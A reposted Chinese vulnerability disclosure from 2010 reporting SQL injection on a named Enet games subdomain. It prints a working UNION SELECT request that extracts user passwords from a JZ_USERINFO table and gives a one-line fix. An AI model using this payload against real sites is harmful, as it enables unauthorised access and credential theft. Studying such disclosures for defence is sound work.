日期:2010-09-08 00:18:00 来源:本站整理
Enet硅谷动力二级站点存在明显注入漏洞及修复筹划[网络技术]
本文“Enet硅谷动力二级站点存在明显注入漏洞及修复筹划[网络技术]”是由七道奇为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:
具体阐明:
硅谷动力游戏站点,存在注入的URL为:
http:/games.enet.com.cn/zhuanti/zx/action/article_v.shtml?id=102929
用union结合查询找出此处有八个字段用null替换之可猜解出用户账号密码,由此招致用户敏感信息泄露.
漏洞证明:
http://games.enet.com.cn/zhuanti/zx/action/article_v.shtml?id=102929%20and%201=2%20union%20all%20select%20null,chr%2894%29||chr%2894%29||chr%2894%29||chr%2894%29||chr%2894%29||chr%2894%29||chr%2894%29||PASSWD,null,null,null,null,null,null%20from%20JZ_USERINFO
修复筹划:
过滤变量.
以上是“Enet硅谷动力二级站点存在明显注入漏洞及修复筹划[网络技术]”的内容,如果你对以上该文章内容感兴趣,你可以看看七道奇为您推荐以下文章:
| 本文地址: | 与您的QQ/BBS好友分享! |
- 好的评价 如果您觉得此文章好,就请您
0%(0) 
- 差的评价 如果您觉得此文章差,就请您
0%(0) 
中查找“Enet硅谷动力二级站点存在明显注入漏洞及修复筹划”更多相关内容
中查找“Enet硅谷动力二级站点存在明显注入漏洞及修复筹划”更多相关内容评论内容只代表网友观点,与本站立场无关!
评论摘要(共 0 条,得分 0 分,平均 0 分)
查看完整评论